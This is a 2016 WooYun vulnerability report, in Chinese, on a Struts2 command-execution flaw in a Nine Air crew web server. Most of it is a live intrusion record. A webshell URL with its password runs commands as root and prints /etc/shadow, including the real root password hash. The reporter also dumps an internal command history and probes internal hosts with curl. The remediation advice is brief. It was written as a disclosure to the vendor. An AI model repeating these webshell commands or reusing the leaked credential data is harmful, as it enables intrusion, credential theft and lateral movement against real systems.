当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198198

漏洞标题:神器而已之九元航空某站命令执行到Getshell再到简单的内网探测

相关厂商:九元航空有限公司

漏洞作者: 路人甲

提交时间:2016-04-19 16:30

修复时间:2016-06-03 17:10

公开时间:2016-06-03 17:10

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-19: 厂商已经确认,细节仅向厂商公开
2016-04-29: 细节向核心白帽子及相关领域专家公开
2016-05-09: 细节向普通白帽子公开
2016-05-19: 细节向实习白帽子公开
2016-06-03: 细节向公众公开

简要描述:

男女之间相处,男人要处处让着女人。就拿我来说,我做任何事就都让着女朋友,比如让她洗衣服,让她做饭,让她刷碗,让她收拾屋子……

详细说明:

http://crew.9air.com:8080/9airweb/allUserMap.action
str2命令执行,少年该打补丁了。
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/etc/shadow
root:$6$tt8sA3oimLmV/DQS$P2kOvG699Pl38HVdoxIU7z1BBJmTA5xjP87FS4T2VsCl42zq52UAhxhT1KyfGutLzjmZ5fZOmRFwr87CZyMlA.:16439:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
dbus:!!:16439::::::
vcsa:!!:16439::::::
rpc:!!:16439:0:99999:7:::
rtkit:!!:16439::::::
avahi-autoipd:!!:16439::::::
abrt:!!:16439::::::
rpcuser:!!:16439::::::
nfsnobody:!!:16439::::::
haldaemon:!!:16439::::::
gdm:!!:16439::::::
ntp:!!:16439::::::
saslauth:!!:16439::::::
postfix:!!:16439::::::
pulse:!!:16439::::::
sshd:!!:16439::::::
tcpdump:!!:16439::::::
clamav:!!:16829::::::


http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=whoami
root权限


http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=ls%20/
bin
boot
dev
etc
history.log
home
lib
lib64
logs
lost+found
media
misc
net
opt
proc
root
sbin
selinux
serverdir
shirodemo.log
shirodemo.log.2016-01-29
shirodemo.log.2016-01-30
shirodemo.log.2016-01-31
shirodemo.log.2016-02-01
shirodemo.log.2016-02-02
shirodemo.log.2016-02-03
shirodemo.log.2016-02-04
shirodemo.log.2016-02-05
shirodemo.log.2016-02-06
shirodemo.log.2016-02-07
shirodemo.log.2016-02-08
shirodemo.log.2016-02-09
shirodemo.log.2016-02-10
shirodemo.log.2016-02-11
shirodemo.log.2016-02-12
shirodemo.log.2016-02-13
shirodemo.log.2016-02-14
shirodemo.log.2016-02-15
shirodemo.log.2016-02-16
shirodemo.log.2016-02-17
shirodemo.log.2016-02-18
shirodemo.log.2016-02-19
shirodemo.log.2016-02-20
shirodemo.log.2016-02-21
shirodemo.log.2016-02-22
shirodemo.log.2016-02-23
shirodemo.log.2016-02-24
shirodemo.log.2016-02-25
shirodemo.log.2016-02-26
shirodemo.log.2016-02-27
shirodemo.log.2016-02-28
shirodemo.log.2016-02-29
shirodemo.log.2016-03-01
shirodemo.log.2016-03-02
shirodemo.log.2016-03-03
shirodemo.log.2016-03-04
shirodemo.log.2016-03-05
shirodemo.log.2016-03-06
shirodemo.log.2016-03-07
shirodemo.log.2016-03-08
shirodemo.log.2016-03-09
shirodemo.log.2016-03-10
shirodemo.log.2016-03-11
shirodemo.log.2016-03-12
shirodemo.log.2016-03-13
shirodemo.log.2016-03-14
shirodemo.log.2016-03-15
shirodemo.log.2016-03-16
shirodemo.log.2016-03-17
shirodemo.log.2016-03-18
shirodemo.log.2016-03-19
shirodemo.log.2016-03-20
shirodemo.log.2016-03-21
shirodemo.log.2016-03-22
shirodemo.log.2016-03-23
shirodemo.log.2016-03-24
shirodemo.log.2016-03-25
shirodemo.log.2016-03-26
shirodemo.log.2016-03-27
shirodemo.log.2016-03-28
shirodemo.log.2016-03-29
shirodemo.log.2016-03-30
shirodemo.log.2016-03-31
shirodemo.log.2016-04-01
shirodemo.log.2016-04-02
shirodemo.log.2016-04-03
shirodemo.log.2016-04-04
shirodemo.log.2016-04-05
shirodemo.log.2016-04-06
shirodemo.log.2016-04-07
shirodemo.log.2016-04-08
shirodemo.log.2016-04-09
shirodemo.log.2016-04-10
shirodemo.log.2016-04-11
shirodemo.log.2016-04-12
shirodemo.log.2016-04-13
shirodemo.log.2016-04-
14
shirodemo.log.2016-04-15
shirodemo.log.2016-04-16
shirodemo.log.2016-04-17
shirodemo.log.2016-04-18
soft
software
srv
sys
tmp
usr
var
weixin


有历史命令文件
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/history.log
这就好玩了.....
414  select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist   inner   join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier   and inf.o_flt_no = oolist.o_flt_no       and     inf.o_flt_org_apt = oolist.o_flt_org_apt              and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1   and    inf.o_flt_id =    ?      and    inf.o_flt_leg_th =    ?      and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender  
  415  2015-12-09 16:16:56,603 DEBUG [java.sql.PreparedStatement] - {pstm-100145} Executing Statement:    select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist   inner   join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier   and inf.o_flt_no = oolist.o_flt_no       and     inf.o_flt_org_apt = oolist.o_flt_org_apt              and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1   and    inf.o_flt_id =    ?      and    inf.o_flt_leg_th =    ?      and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender  
  416  [DEBUG] 2015-12-09 16:16:56,603 - {pstm-100145} Executing Statement:    select 
count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist   inner   join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier   and inf.o_flt_no = oolist.o_flt_no       and     inf.o_flt_org_apt = oolist.o_flt_org_apt              and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1   and    inf.o_flt_id =    ?      and    inf.o_flt_leg_th =    ?      and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender 3171526575
  417  tail -f catalina.out 
sql之类的,留着,可能后期会用到....
754  ssh [email protected]
 756  ssh [email protected]
内网貌似还蛮大的
829  cd /
  830  ls
  831  cd /serverdir/
  832  ls
  833  cd tomcat/
  834  ls
  835  cd apache-tomcat-7.0.57/
  836  ls
  837  cd webapps/
  838  ls
  839  cd test/
  840  ls
  841  cd ..
  842  rm -rf test
  843  ls
  844  cd 9airweb
  845  ls
  846  cat return_url.jsp 
  847  ll
  848  cat index_hd.jsp 
web目录在这里
怎么安装了安全狗?
 877  tar -zxvf safedog_linux64.tar.gz 
  878  ll
  879  cd safedog_linux64
  880  ls
  881  python install.py
  882  service safedog status
  883  python install.py


http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/shirodemo.log.2016-04-15
都是数据库的log

漏洞证明:

看了下hosts,没有什么内网的ip,截止目前为止,之收集到两个ip段
10.10.2.x
192.168.34.x
不过看样子应该内网很大。
继续探测
本想用find把你们目录文件全部列出来的...算了吧....
直接用粗暴的方法去探测内网了
curl
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.24
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.25
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.31
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.14
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.15
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.17
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.42
it wokes!
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.46
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.36
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.52/wechat/WEB-INF/web.xml  找到个没卵用的xml。
写个小脚本去跑下。


粗暴的方式.png

修复方案:

1.打补丁;
2.删除那个历史命令文件;
3.检查系统日志,看看是否被骇客入侵;
4.别客气,eq击飞空中吊打运维。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-19 17:06

厂商回复:

最新状态:

暂无